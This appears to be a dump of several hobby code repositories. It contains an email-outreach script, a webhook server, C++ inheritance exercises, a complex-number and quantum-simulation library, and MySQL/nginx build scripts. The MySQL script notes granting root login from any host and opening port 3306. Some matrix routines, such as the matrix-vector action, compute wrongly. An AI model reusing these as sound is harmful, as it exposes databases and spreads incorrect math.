# uppercase_name += term[0].upper() + term[1:] + ' '
# names.append(uppercase_name.replace('\n', ''))
# for contact in contact_emails:
# emails.append(contact.strip('\n'))
# return names, emails
# from string import Template
# def read_template(filename):
# with open(filename, 'r', encoding='utf-8') as template_file:
# template_file_content = template_file.read()
# return Template(template_file_content)
# names, emails = get_contacts('mycontacts1.txt', 'mycontacts2.txt')
# for i in range(len(names)):
# print(i+2, names[i], emails[i])
# #SETUP SMTP SERVER
# import smtplib
# s = smtplib.SMTP(host='smtp.gmail.com', port=587)
# s.starttls()
# s.login(MY_ADDRESS, PASSWORD)
# #SEND EMAILS
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# print(emails[53:])
# TODO: remove test name and email
# names = ['<NAME>', '<NAME>']
# emails = [['<EMAIL>', '<EMAIL>'], ['<EMAIL>', '<EMAIL>']]
# message_template = read_template('message.txt')
# for name, email in zip(names[53:], emails[53:]):
# print(name, email)
# msg = MIMEMultipart() # create a message
# # add in the actual person name to the message template
# message = message_template.substitute(ARTIST_NAME=name.title())
# # setup the parameters of the message
# msg['From']= '<NAME>'
# msg['To']=",".join(email)
# msg['Subject']= name + " Test Tracked Emails"
# # add in the message body
# msg.attach(MIMEText(message, 'plain'))
# msg = msg.as_string()
# # send the message via the server set up earlier.
# #s.sendmail(MY_ADDRESS, email, msg)
# del msg
<file_sep>/server/server.js
const WebHooks = require('node-webhooks');
const hook = new WebHooks({
db: './webHookdDB.json',
httpSuccessCodes: [200, 201, 202, 203, 204],
});
const emitter = hook.getEmitter();
emitter.on('*.success', function(shortname, statusCode, body) {
console.log('Success on trigger webHook' + shortname + 'with status code', statusCode, 'and body', body);
});
emitter.on('*.failure', function(shortname, statusCode, body) {
console.error('Error on trigger webHook' + shortname + 'with status code', statusCode, 'and body', body);
});
const express = require('express');
const app = express();
const port = process.env.PORT || 8080;
app.listen(port, () => console.log(`Server up and running on port ${port} !`));
app.get('/', (req, res) => {
res.send(201);
console.log('webhook hit');
});
<file_sep>/server/package.json
{
"name": "email-auto",
"version": "1.0.0",
"description": "web server for email tracking",
"main": "server.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1",
"start": "node server.js",
"lint": "prettier --write '**/*' --single-quote && eslint .",
"lint-fix": "eslint . --fix"
},
"dependencies": {
"eslint-config-bliss": "^3.3.0",
"express": "^4.16.4"
},
"eslintConfig": {
"extends": [
"airbnb",
"bliss"
],
"rules": {
"semi": [
"error",
"always"
]
}
},
"author": "<NAME>",
"license": "ISC",
"devDependencies": {
"babel-plugin-transform-class-properties": "^6.24.1",
"eslint": "^5.15.3",
"eslint-config-airbnb": "^17.1.0",
"eslint-config-airbnb-base": "^13.1.0",
"eslint-config-google": "^0.12.0",
"eslint-config-react-app": "^3.0.8",
"eslint-plugin-flowtype": "^3.4.2",
"eslint-plugin-flowtype-errors": "^4.0.0",
"eslint-plugin-import": "^2.16.0",
"eslint-plugin-jsx-a11y": "^6.2.1",
"eslint-plugin-react": "^7.12.4",
"prettier": "^1.16.4"
}
}
<file_sep>/script/csv_contacts.py
MY_ADDRESS =
PASSWORD =
def get_contacts(names, emails):
# import name, email
with open(names, 'r') as artist_names:
with open (emails, 'r') as contact_emails:
names = []
emails = []
for name in artist_names:
#uppercase name
uppercase_name = ''
caps = name.split()
for i, term in enumerate(caps):
if i == len(caps) - 1:
uppercase_name += term[0].upper() + term[1:]
else:
uppercase_name += term[0].upper() + term[1:] + ' '
names.append(uppercase_name.replace('\n', ''))
for contact in contact_emails:
asset = contact.replace(' ', '')
asset = asset.strip('\n')
emails.append(asset.split(','))
# for i in range(len(emails)):
# print(names[i], emails[i])
return names, emails
def read_template(filename):
with open(filename, 'r', encoding='utf-8') as template_file:
template_file_content = template_file.read()
return Template(template_file_content)
names, emails = get_contacts('chella_2_names.txt', 'chella_2_emails.txt')
#SETUP SMTP SERVER
import smtplib
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login(MY_ADDRESS, PASSWORD)
#SEND EMAILS
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from string import Template
#TODO: remove test name and email
#print(emails)
#names = ['<NAME>', '<NAME>']
#emails = [['<EMAIL>', '<EMAIL>'], ['<EMAIL>', '<EMAIL>', '<EMAIL>']]
message_template = read_template('message1.txt')
for name, email in zip(names[45:], emails[45:]):
print(name, email)
msg = MIMEMultipart() # create a message
fromaddr = MY_ADDRESS
toaddr = email[0]
bcc = email[1:] if len(email) > 1 else []
message_subject = "Coachella 2019: " + name + ' photographer'
# add in the actual person name to the message template
message = "From: %s\r\n" % fromaddr + "To: %s\r\n" % toaddr + "Subject: %s\r\n" % message_subject + "\r\n" + message_template.substitute(ARTIST_NAME=name.title())
# setup the parameters of the message
#AVI
#msg['From']= '<NAME>'
#sina
msg['From']= '<NAME>'
msg['To']=email[0]
#Avi
# msg['Subject']= "Coachella 2019: " + name + ' photographer'
msg['Subject']= name + " Coachella 2019 photographer"
toaddrs = [toaddr] + bcc
# add in the message body
msg.attach(MIMEText(message, 'plain'))
msg = msg.as_string()
# send the message via the server set up earlier.
s.sendmail(MY_ADDRESS, toaddrs, message)
del msg
| 5b8a9a80e61cbfde1f0c82ad97f6ddf3b4047b2a | [
"JavaScript",
"JSON",
"Python"
] | 4 | Python | avibanerjee/EmailAutomation | 3ace10d7f28e3ecb12be597c94fb6ad10305af46 | d5a26751d680ecbc5014a409f04ddbc0f7d936ee |
refs/heads/master | <file_sep>#pragma once
#include "Actor.h"
class Actor2 : public Actor
{
public:
Actor2();
~Actor2();
int SumActor2(int x, int y);
void Hello() override;
};
<file_sep>#include "pch.h"
#include "Actor.h"
using namespace std;
Actor::Actor()
{
//cout << "Hello im an Actor\n";
}
Actor::~Actor()
{
}
void Actor::printRef2() const
{
cout << "p_ref2: " << p_ref2 << endl;
}
int Actor::SumNumber(int x, int y)
{
int sum;
sum = x + y;
return sum;
}
void Actor::Hello()
{
cout << "Hello im the first actor!!\n";
}
<file_sep>#include "pch.h"
#include "Actor2.h"
using namespace std;
Actor2::Actor2()
{
//cout << "Hello im an Actor2";
}
Actor2::~Actor2()
{
}
int Actor2::SumActor2(int x, int y)
{
int sum2;
sum2 = x * y;
return sum2;
}
void Actor2::Hello()
{
cout << "Hello im the second actor!\n";
}
<file_sep>
#include "pch.h"
#include "Actor.h"
#include "Actor2.h"
#include <iostream>
using namespace std;
void CallHello(Actor& actor) {
actor.Hello();
}
void CallHello_Bad(Actor actor) {
actor.Hello();
}
int main()
{
Actor actor;
Actor2 actor2;
//actor.printRef2();
//Actor::Actor();
//cout<<actor2.SumActor2(10,30);
CallHello(actor);
CallHello(actor2);
CallHello_Bad(actor);
CallHello_Bad(actor2);
}
<file_sep>#pragma once
#include <iostream>
class Actor
{
public:
Actor();
~Actor();
int ref1 = 10;
virtual void printRef2()const;
virtual int SumNumber(int x, int y);
virtual void Hello();
private:
int p_ref2 = 20;
};
| 06bb8f2939b4e8470c56e1e0d4f0b7b8c5267d5e | [
"C++"
] | 5 | C++ | PR1202/TestClasses | 66fe0cc111f24f99dfcca3613510a35282efe778 | 49c0a151511282a73e46373d6102b78cbd4d3eea |
refs/heads/main | <repo_name>santiforero1018/clasic_to_quantyc<file_sep>/Libreria_numeros_complejos.py
"""Libreria de operaciones basicas con numeros complejos
"""
import math
def tensor_productv(vectorco1, vectorco2):
""" producto tensor entre los vectores
:param vectorco1: vecotr de valores complejos
:param vectorco2: vectotr de valores complejos
:return: producto tensor
"""
lon_tensor = len(vectorco1) * len(vectorco2)
R = [(0, 0)] * lon_tensor
index = 0
for i in range(len(vectorco1)):
for j in range(len(vectorco2)):
R[index] = multiplicacion_complejos(vectorco1[i], vectorco2[j])
index += 1
return R
def hermitiana(matriz):
""" determina si una matriz es hermitiana
:param matriz: una matriz de complejos
:return: un valor booleano
"""
matrizh = adjunta(matriz)
if matrizh == matriz:
return True
else:
return False
def unitaria(matriz):
""" revisa si una matriz es unitaria
:param matriz: matriz de complejos
:return: valor booleano
"""
matrizt = adjunta(matriz)
identidad = [[(0, 0) for i in range(len(matriz[0]))] for j in range(len(matriz))]
for i in range(len(identidad)):
for j in range(len(identidad[0])):
if i == j:
identidad[i][j] = (1, 0)
if multiplicacion_matrices(matrizt, matriz) == identidad:
return True
else:
return False
def distanciav(vectorc1, vectorc2):
if len(vectorc1) == len(vectorc2):
dif1 = []
for i in range(len(vectorc1)):
dif1.append(resta_complejos(vectorc1[i], vectorc2[i]))
productodif = int_product(dif1, dif1)
distancia = modulo_complejos(productodif)
return distancia
def norma_vector(vectorc):
""" realiza la norma de un vector
:param vectorc: vector de complejos
:return: norma del vector
"""
productoint = int_product(vectorc, vectorc)
norma = modulo_complejos(productoint)
return norma
def int_product(vectorc1, vectorc2):
"""producto interno entre dos vectores complejos
:param vectorc1: vector de numeros complejos
:param vectorc2: vector de numeros complejos
:return: porducto interno entre vecotres
"""
if len(vectorc1) == len(vectorc2):
productoint = (0, 0)
vectorc1 = conjugadov(vectorc1)
for i in range(len(vectorc1)):
productoint = suma_complejos(productoint, multiplicacion_complejos(vectorc1[i], vectorc2[i]))
return productoint
else:
return False
def accionmatriz_vector(matrix, vector):
""" accion de una matriz sobre un vector
:param matrix: matriz de complejos
:param vector: vector de complejos
:return: accion de la matriz sobre un vector
"""
if len(matrix[0]) == len(vector):
accion = []
for i in range(len(matrix)):
accion.append((0, 0))
for i in range(len(matrix)):
for j in range(len(vector)):
for k in range(len(matrix[0])):
accion[i] = suma_complejos(accion[i], multiplicacion_complejos(matrix[i][k], vector[j]))
return accion
else:
return False
def multiplicacion_matrices(matrix1, matrix2):
""" multiplicacion entre matrices complejas
:param matrix1: matriz de compliejos
:param matrix2: matriz de complejos
:return: producto entre matrices
"""
if len(matrix1[0]) == len(matrix2):
matrixr = []
for i in range(len(matrix1)):
matrixr.append([])
for j in range(len(matrix2[0])):
matrixr[i].append((0, 0))
for i in range(len(matrix1)):
for j in range(len(matrix2[0])):
for k in range(len(matrix1[0])):
matrixr[i][j] = suma_complejos(matrixr[i][j],
multiplicacion_complejos(matrix1[i][k], matrix2[k][j]))
return matrixr
else:
return False
def adjunta(matriz):
""" adjunta de una matriz
:param matriz: matriz de complejos
:return: adjunta de la matriz
"""
matrizad = conjugadom(transpuesta(matriz))
return matrizad
def conjugadom(matriz):
""" conjugado de una matriz de complejos
:param matriz: matriz de complejos
:return: conjugado de la matriz
"""
for i in range(len(matriz)):
for j in range(len(matriz[0])):
matriz[i][j] = conjugado_complejos(matriz[i][j])
return matriz
def conjugadov(lista):
""" conjugado de un vector de complejos
:param lista: vector de complejos
:return: conjugado vector o matriz de complejos
"""
for i in range(len(lista)):
lista[i] = conjugado_complejos(lista[i])
return lista
def transpuesta(lista):
""" transpuesta de una matriz
:param lista: matriz de complejos
:return: transpuesta de la matriz
"""
transp = []
for i in range(len(lista[0])):
transp.append([])
for j in range(len(lista)):
transp[i].append(lista[j][i])
return transp
def multiescalar_matrix(complexn, matrix):
"""multiplicacion escalar por una matriz
:param complexn: numero complejo
:param matrix: matriz de complejos
:return: multiplicacion escalar
"""
for i in range(len(matrix)):
for j in range(len(matrix[0])):
matrix[i][j] = multiplicacion_complejos(complexn, matrix[i][j])
return matrix
def inversa_add_matrizc(matrizc):
"""inversa aditiva de una matriz compleja
:param matrizc: matriz de numeros complejos
:return: inversa aditiva de la matriz
"""
for i in range(len(matrizc)):
for j in range(len(matrizc[0])):
matrizc[i][j] = multiplicacion_complejos((-1, 0), matrizc[i][j])
return matrizc
def suma_matricesc(matrizc1, matrizc2):
"""suma de dos matricves complejas
:param matrizc1: matriz de numeros complejos
:type matrizc1: list
:param matrizc2: matriz de numeros complejos
:type matrizc2: matriz de numeros complejos
:return: suma de las matrices
:rtype: list
"""
if len(matrizc1) == len(matrizc2) and len(matrizc1[0]) == len(matrizc2[0]):
line = [(0, 0)] * len(matrizc1[0])
matriz_r = [line] * len(matrizc1)
for j in range(len(matrizc1)):
for k in range(len(matrizc1[0])):
matriz_r[j][k] = suma_complejos(matrizc1[j][k], matrizc2[j][k])
return matriz_r
def multi_escalar(complex_num, complex_v):
""" multiplicacion por un escalar
:param complex_num: un numero complejo
:typecomplex_num: tuple
:param complex_v: vector complejo
:type complex_v: list
:return: vector resultante
:rtype list
"""
r_vector = [(0, 0)] * len(complex_v)
for x in range(len(complex_v)):
r_vector[x] = multiplicacion_complejos(complex_num, complex_v[x])
return r_vector
def inverse_vectorcx(vectorc):
""" inverso aditivo de un vector complejo
:param vectorc: vector de numeros complejos
:return: inverso aditivo del vector ingresado
:rtype: list
"""
inverse_v = [(0, 0)] * len(vectorc)
for x in range(len(vectorc)):
inverse_v[x] = multiplicacion_complejos((-1, 0), vectorc[x])
return inverse_v
def suma_vectorescpx(vectorc_1, vectorc_2):
""" suma de dos vectores complejos
:param vectorc_1: vector complejo
:param vectorc_2: vector complejo
:return: vector suma
:rtype: list
"""
if len(vectorc_1) == len(vectorc_2):
svector = [(0, 0)] * len(vectorc_1)
for x in range(len(vectorc_1)):
svector[x] = (suma_complejos(vectorc_1[x], vectorc_2[x]))
return svector
def potencia_polar(polar1, num):
"""potencia de un numero complejo en representación polar
:param polar1: numero complejo en representacion polar
:type polar1: tuple
:param num: exponente
:return: potencia del numero complejo
:rtype: tuple
"""
potencia_complejo = (round(polar1[0] ** num, 2), round(num * polar1[1], 2))
return potencia_complejo
def division_polar(polar1, polar2):
"""division de dos numeros complejos en representacion polar
:param polar1: numero complejo en representacion polar
:type polar1: tuple
:param polar2: numero complejo en representacion polar
:type polar2: tuple
:return: division entre los numeros complejos en representación polar
:rtype: tuple
"""
complejo_polar = (round(polar1[0] / polar2[0], 2), round(polar1[1] - polar2[1], 2))
return complejo_polar
def multiplicacion_polar(polar1, polar2):
"""multiplicación de dos numeros complejos en representacion polar
:param polar1: numero complejo en representacion polar
:type polar1: tuple
:param polar2: numero complejo en representacion polar
:type polar2: tuple
:return: producto entre los numeros complejos en representación polar
:rtype: tuple
"""
complejo_polar = (round(polar1[0] * polar2[0], 2), round(polar1[1] + polar2[1], 2))
return complejo_polar
def rep_cartesiana(par):
"""representa un numero complejo en representanción cartesiana
:param par: representacion polar de un numero complejo
:type par: tuple
:return: representación cartesiana de un nnumero complejo
:rtype: tuple
"""
complejo = (round(par[0] * math.cos(par[1]), 2), round(par[0] * math.sin(par[1]), 2))
return complejo
def rep_polar(par):
"""representa un numero complejo en una representacion polar
:param par: representacion cartesiana de un numero complejo
:type par: tuple
:return: representacion polar de un numero complejo
:rtype: tuple
"""
p = modulo_complejos(par)
ang = round(math.atan(par[1] / par[0]), 2)
result = (p, ang)
return result
def conjugado_complejos(par):
""" realiza el conjugado de un numero complejo
:param par: representacion de un numero complejo en coordenadas cartesianas
:type par: tuple
:return: el numero complejo conjugado
:rtype: tuple
"""
new_b = par[1] * -1
new_par = (par[0], new_b)
return new_par
def modulo_complejos(par):
""" Realiza el conjugado de un numero complejo
:param par: representación de un numero complejo en coordenadas cartesianas
:type par: tuple
:return: un entero valor del modulo de un numero complejo
:rtype: int
"""
modulo = (par[0] ** 2 + par[1] ** 2)
return round(math.sqrt(modulo), 2)
def division_complejos(par1, par2):
"""
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la division
:rtype: tuple
"""
d = (par2[0] ** 2 + par2[1] ** 2)
x = (par1[0] * par2[0] + par1[1] * par2[1]) / d
y = (par2[0] * par1[1] - par1[0] * par2[1]) / d
result = (round(x, 2), round(y, 2))
return result
def resta_complejos(par1, par2):
"""Resta de dos numeros complejos
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la resta
:rtype: tuple
"""
result = (round(par1[0] - par2[0], 2), round(par1[1] - par2[1], 2))
return result
def suma_complejos(par1, par2):
"""Suma dos numeros complejos
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la suma
:rtype: tuple
"""
result = (round(par1[0] + par2[0], 2), round(par1[1] + par2[1], 2))
return result
def multiplicacion_complejos(par1, par2):
"""Multiplicacion de dos numeros complejos
:param par1: representación de un numero complejo en coordenadas cartesianas
:type par1: tuple
:param par2: representación de un numero complejo en coordenadas cartesianas
:type par2: tuple
:return: una lista como representación de el numero complejo resultante de la multiplicacion
:rtype: tuple
"""
result = (round((par1[0] * par2[0]) - (par1[1] * par2[1]), 2), round((par1[0] * par2[1]) + (par1[1] * par2[0]), 2))
return result
if __name__ == '__main__':
print(modulo_complejos((2, 0)))
<file_sep>/sistemas_cuanticos_cnyt.py
""" Libreria simulación de lo clasico a lo cuantico
<NAME>
CNYT
"""
import math
import Libreria_numeros_complejos as nc
def interferencias(matriz):
"""funcion que regresa las interferencias de un sistema
:param matriz: matriz de un sistema de rendijas
:return: matriz de interferencias
"""
matriz_interfe = []
for i in range(len(matriz)):
for j in range(len(matriz)):
tempo = 0
for k in range(len(matriz[i])):
tempo1 = matriz[i][k] * matriz[k][j] + tempo
if tempo1 == tempo and (matriz[i][j] != 0 or matriz[j][i] != 0):
matriz_interfe += [[i, j]]
return matriz_interfe
def multi_rendijas(matriz, vector, clicks):
""" función que multiplica una matriz por si misma y devuelve el vector estado despues de una cierta cantidad
de clicks
:param matriz: matriz adyacente al sistema
:param vector: vector estado inicial
:param clicks: cantidad de clicks
:return: vector estado despues de los clicks
"""
matriz_prod = nc.multiplicacion_matrices(matriz, matriz)
vector_est = system_clikcs(matriz_prod, vector, clicks)
return vector_est
def probabilistic_ad_matrix(matrix, frac):
""" funcion que permite ingresar fracionarios a las entradas de una matriz booleana
:param matrix: matriz booleana
:param frac: numeros fraccionarios a rremplazar
:return: matriz propabilistica
"""
k = 0
for i in range(len(matrix)):
for j in range(len(matrix[0])):
if matrix[i][j] == 1:
matrix[i][j] = frac[k]
k += 1
return matrix
def Boolean_ad_matrix(first_vertex, mov_vertex):
"""crea una matriz adyacente booleana
:param first_vertex: vertices iniciales
:param mov_vertex: vertices a donde llegan los vertices iniciales
:return:matriz adyacente booleana
"""
matriz_ad = [[(0, 0) for j in range(len(first_vertex))] for i in range(len(mov_vertex))]
for i in range(len(first_vertex)):
for j in range(len(mov_vertex)):
if i == j:
matriz_ad[mov_vertex[j]][first_vertex[i]] = (1,0)
return matriz_ad
def system_clikcs(matriz_ad, vector, number):
"""determina el vector estado despues de una cierta cantidad de clicks
:param matriz_ad: matriz adyacente al sistema
:param vector: vector estado
:param number: cantidad de clikcs
:return: vector estado despues de number clicks
"""
i = 0
while i < number:
vector_cl = nc.accionmatriz_vector(matriz_ad, vector)
vector = vector_cl
i += 1
return vector
<file_sep>/probadorTeoria.py
import math
import unittest
import TeoriaQ as tq
class theory_test(unittest.TestCase):
def test_pp(self):
self.assertEqual(tq.prob_position(2, [(-3, -1), (0, -2), (0, 1), (2, 0)]), 0.053)
def test_amt(self):
self.assertEqual(
tq.amplitud_tran([(-1, -4), (2, -3), (-7, 6), (-1, 1), (-5, -3), (5, 0), (5, 8), (4, -4), (8, -7), (2, -7)],
[(2, 1), (-1, 2), (0, 1), (1, 0), (3, -1), (2, 0), (0, -2), (-2, 1), (1, -3), (0, -1)]),
(-3, 19))
def test_esvalue(self):
self.assertEqual(
tq.expected_value([[(1, 0), (0, -1)], [(0, 1), (2, 0)]], [(math.sqrt(2) / 2, 0), (0, math.sqrt(2) / 2)]),
(2.5, 0))
def test_mediavar(self):
self.assertEqual(
tq.mediaandvar([[(1, 0), (0, -1)], [(0, 1), (2, 0)]], [(math.sqrt(2) / 2, 0), (0, math.sqrt(2) / 2)]),
([[(0.0, 1.0), (-0.5, 0.0)], [(0.0, 1.0), (-0.5, 0.0)]], (1.2, 0)))
def test_441(self):
self.assertEqual(
tq.cuatro1([[(0, 0), (1, 0)], [(1, 0), (0, 0)]], [[(math.sqrt(2)/2, 0), (math.sqrt(2)/2, 0)],
[(math.sqrt(2)/2, 0),
(-math.sqrt(2)/2, 0)]]), True)
if __name__ == "__main__":
unittest.main()
<file_sep>/README.md
# Salto de lo calsico a lo cuantico
simulación aproximada de sistemas cuanticos.
uso de obvserbables, medidas.
solución de los ejercicios 4.41 y 4.4.2.
probador de la libreria añadido.
<file_sep>/TeoriaQ.py
"""PRACTICA DE LA TEORIA CUANTICA
<NAME>
CNYT
"""
import sistemas_cuanticos_cnyt as sc
import Libreria_numeros_complejos as nc
import math
import numpy as np
def cuatro2(biliar_matriz, ket, num):
"""resolucion del ejercicio 4.4.2
:param biliar_matriz: matriz adyacent a la bola de billar
:param ket: estado inicial
"""
solution = sc.system_clikcs(biliar_matriz, ket, num)
return solution
def cuatro1(matriz1, matriz2):
"""Resolucion del porblema 4.4.1
:param matriz1: posible matriz unitaria
:param matriz2: posible matriz unitaria
:return: un booleano
"""
if nc.unitaria(matriz1) and nc.unitaria(matriz2):
product = nc.multiplicacion_matrices(matriz1, matriz2)
if nc.unitaria(product):
return True
return False
def eingenvalues_vectors(matriz_ob):
"""funcion que calcula los valores y vectores propios de una matriz
:param matriz_ob: observable
:return: valores propios y vectores propios
"""
matriz = np.array(matriz_ob)
eingenvalues, eingenvectors = np.linalg.eig(matriz)
return eingenvalues, eingenvectors
def generador_idn(matriz):
"""funcion que genera una matriz identidad
:param matriz: lista en 2D
:return: matriz identidad
"""
midentidad = [[(0, 0) for j in range(len(matriz))] for i in range(len(matriz))]
for i in range(len(midentidad)):
for j in range(len(midentidad[0])):
if i == j:
midentidad[i][j] = (1, 0)
print(midentidad)
return midentidad
def mediaandvar(matriz_ob, estado):
"""Calcula la media y la varianza del observable en el estado dado
:param matriz_ob: observavle
:param estado: estado preparado
:return: media y variancia
"""
es_value = expected_value(matriz_ob, estado)
if observables(matriz_ob):
midentidad = generador_idn(matriz_ob)
restador = nc.multiescalar_matrix(es_value, midentidad)
restador = nc.inversa_add_matrizc(restador)
delta = nc.suma_matricesc(matriz_ob, restador)
delta_multi = nc.multiplicacion_matrices(delta, delta)
variancia = expected_value(delta_multi, estado)
return delta, variancia
def expected_value(matriz_ob, estado):
"""calcula el valor esperado despues de medir el sistema varias veces
:param matriz_ob: observable
:param estado: estado preparado
:return: valor esperado
"""
first_part = nc.accionmatriz_vector(matriz_ob, estado)
value = nc.int_product(estado, first_part)
m_value = nc.modulo_complejos(value)
return (round(m_value, 1), 0)
def observables(matriz_ob):
""" funcion que revisa si el observable ingresado es una matriz hermitiana
:param matriz_ob: matriz posiblemente hermitiana
:return: Booleana
"""
return nc.hermitiana(matriz_ob)
def amplitud_tran(ket, ket1):
""" función que calcula la amplitud de transcición
:param ket: vector estado 1
:param ket1: vector estado 2
:return: amplitud de transición
"""
transision = nc.int_product(ket1, ket)
return transision
def prob_position(p, ket):
""" función que determina la probabilidad de enccontrar una particula en una posición dada
:param p: posición
:param ket: vector estado
:return: probabilidad
"""
posisition_value = nc.modulo_complejos(ket[p]) ** 2
magnitud_ket = 0
for i in range(len(ket)):
magnitud_ket += nc.modulo_complejos(ket[i]) ** 2
magnitud_ket = math.sqrt(magnitud_ket)
probabilidad = posisition_value / magnitud_ket ** 2
return round(probabilidad, 3)
| 9cdb2cb3af988dc79f5a2d4fe7ac9b43c5fb502a | [
"Markdown",
"Python"
] | 5 | Python | santiforero1018/clasic_to_quantyc | b189668ca0024ec4c7ec0e94022f5d344cb99dc6 | 91ce554f372c1fba6c7466f7ad8e81a9489d5ce6 |
refs/heads/master | <repo_name>Leandrolara2/php-aula--introdu-o<file_sep>/index.php
<?php
$categorias = [];
$categorias[] = 'infantil';
$categorias[] = 'adolecente';
$categorias[] = 'adulto';
$categorias[] = 'idoso';
//print_r($categorias);
$nome = 'Eduardo';
$idade = 90;
//var_dump($nome);
//var_dump($idade);
if($idade >= 0 && $idade <=12)
{
echo 'infatil';
}
else if($idade >= 13 && $idade <=17)
{
echo 'adolecente';
}
else if($idade >= 18 && $idade <=59)
{
echo 'adulto';
}
else
{
echo 'idoso';
} | b2f50ee4725a19e905fe463b5f802d2bf89b7636 | [
"PHP"
] | 1 | PHP | Leandrolara2/php-aula--introdu-o | d72f8ee3c2a39ebe920b0309096a92632f9f3dd9 | 8dd2d877155c5d3e75d4f1737b3f27f36a6e5a4c |
refs/heads/master | <repo_name>AntiIO/lnmp<file_sep>/lnmp安装/软件安装/mysql安装/mysql_server_install.sh
#!/bin/sh
# Builds and installs a MySQL 5.6 server from source, together with its
# build prerequisites (bison, ncurses, cmake), then creates the mysql
# user/group, initialises the data directory, registers the init
# service, sets the root password and opens port 3306.
# NOTE(review): there is no "set -e" - every step runs even if the
# previous one failed; run interactively and watch the output.

# Install bison (parser generator required by the MySQL build)
echo "正在安装bison******************"
cd /usr/local/src
wget ftp://ftp.gnu.org/gnu/bison/bison-3.0.4.tar.gz
tar xf bison-3.0.4.tar.gz
cd bison-3.0.4
./configure
make && make install

# Install ncurses (terminal library used by the mysql client tools)
echo "正在安装ncurses******************"
cd /usr/local/src
wget ftp://ftp.gnu.org/gnu/ncurses/ncurses-6.0.tar.gz
tar xf ncurses-6.0.tar.gz
cd ncurses-6.0
./configure
make && make install

# Install CMake (MySQL 5.6 uses a cmake-based build)
echo "正在安装CMAKE******************"
cd /usr/local/src
wget https://cmake.org/files/v3.3/cmake-3.3.2.tar.gz
tar xf cmake-3.3.2.tar.gz
cd cmake-3.3.2
./configure
gmake && make install

# Build and install MySQL itself (tarball expected in /root/download)
echo "正在安装mysql******************"
cd /root/download/
tar xf mysql-5.6.17.tar.gz
cd mysql-5.6.17
cmake ./ -DCMAKE_INSTALL_PREFIX=/usr/local/mysql -DMYSQL_DATADIR=/usr/local/mysql/data -DDOWNLOAD_BOOST=1 -DWITH_BOOST=/usr/local/src/boost
make && make install

# Create the service account MySQL runs as
echo "正在添加用户和用户组******************"
groupadd mysql
useradd mysql -g mysql -M -s /sbin/nologin
# useradd flags:
# -g: primary group for the new user
# -M: do not create a home directory
# -s: login shell; /sbin/nologin means the account cannot log in

# Initialise the data directory
echo "正在初始化数据库******************"
cd /usr/local/mysql
chown -R mysql:mysql . #(for safety, hand ownership back to root after the install below)
scripts/mysql_install_db --user=mysql #(run this BEFORE the permission changes that follow)
chown -R root:mysql . #(root owns the tree, group mysql keeps read/execute; other users get nothing)
chown -R mysql:mysql ./data #(only the data directory stays writable by the mysql user)

# Config file and startup script
echo "正在配置mysql******************"
cp support-files/my-default.cnf /etc/my.cnf #(make /etc/my.cnf executable-safe: root/group rx only, strip other users' access)
# Register mysql as a system service
cp support-files/mysql.server /etc/init.d/mysql
chmod +x /etc/init.d/mysql
# Start mysql on boot
chkconfig --add mysql
# Start mysql now
service mysql start
# Set the root password (mysql must already be running)
cd /usr/local/mysql
#################################
# For MySQL 5.7+ the password is changed like this instead:
#mysql> use mysql
#Database changed
#mysql> update user set authentication_string=password("<PASSWORD>") where user="root" and Host="localhost";
#################################
./bin/mysqladmin -u root password '<PASSWORD>'
#./bin/mysqladmin -u root -h web-mysql password '<PASSWORD>' # did not work here
# For remote access, also open port 3306 in the firewall
# (rules file lives at /etc/sysconfig/iptables)
#/sbin/iptables -A INPUT m state --state NEW m tcp p dport 3306 j ACCEPT
/sbin/iptables -I INPUT -p tcp --dport 3306 -j ACCEPT
service iptables restart
# Remote access also needs user grants inside the database.
# BUG FIX: the two SQL statements below were plain lines, so the shell
# tried to execute "delete" and "update" as commands; they are manual
# steps to run inside the mysql client and are kept as documentation.
# Delete users with an empty password:
#   delete from user where password="";
# Allow root to log in from any host:
#   update user set host = '%' where user = 'root';
# Restart mysql for the grants to take effect
/etc/init.d/mysql restart
boost安装
-- BOOST_INCLUDE_DIR /usr/local/include
-- LOCAL_BOOST_DIR
-- LOCAL_BOOST_ZIP
-- Could not find (the correct version of) boost.
-- MySQL currently requires boost_1_59_0<file_sep>/lnmp安装/nginx_install.sh
#!/bin/bash
##############################################
## nginx 1.9.6 install script
## cloud-update web team (liuhui05)
## (header previously said 1.4.5; the script has always fetched 1.9.6)
#############################################
# BUG FIX: the shebang was below the comment banner, so it was inert;
# it must be the first line of the file to select bash.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
# Check if user is root
if [ $(id -u) != "0" ]; then
echo "Error: You must be root to run this script, please use root to install this shell script"
exit 1
fi
# BUG FIX: create the www group/user BEFORE chown'ing /var/log/nginx to
# them - previously the chown ran first and failed on a fresh system.
groupadd www
useradd -s /sbin/nologin -g www www
mkdir -p /var/log/nginx
chown www.www /var/log/nginx
mkdir -p /root/download
cd /root/download
yum -y install pcre-devel zlib zlib-devel openssl openssl-devel
ulimit -SHn 65535
ldconfig
wget http://nginx.org/download/nginx-1.9.6.tar.gz
tar zxvf nginx-1.9.6.tar.gz
cd nginx-1.9.6/
./configure --user=www --group=www --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_ssl_module --with-http_gzip_static_module --with-pcre
make && make install
cd ../
#wget -c "http://wiki.nginx.org/index.php?title=RedHatNginxInitScript&action=raw&anchor=nginx" -O init.d.nginx
#cp init.d.nginx /etc/init.d/nginx
#chmod +x /etc/init.d/nginx
# The init script at /etc/init.d/nginx needs manual configuration first:
#chkconfig --add nginx
#chkconfig nginx on
#/etc/init.d/nginx start
# Open HTTP port 80 in the firewall
/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
#ps aux |grep nginx<file_sep>/README.md
lnmp
====
linux下面运维环境学习
<file_sep>/lnmp安装/centos_install.sh
#############################################################
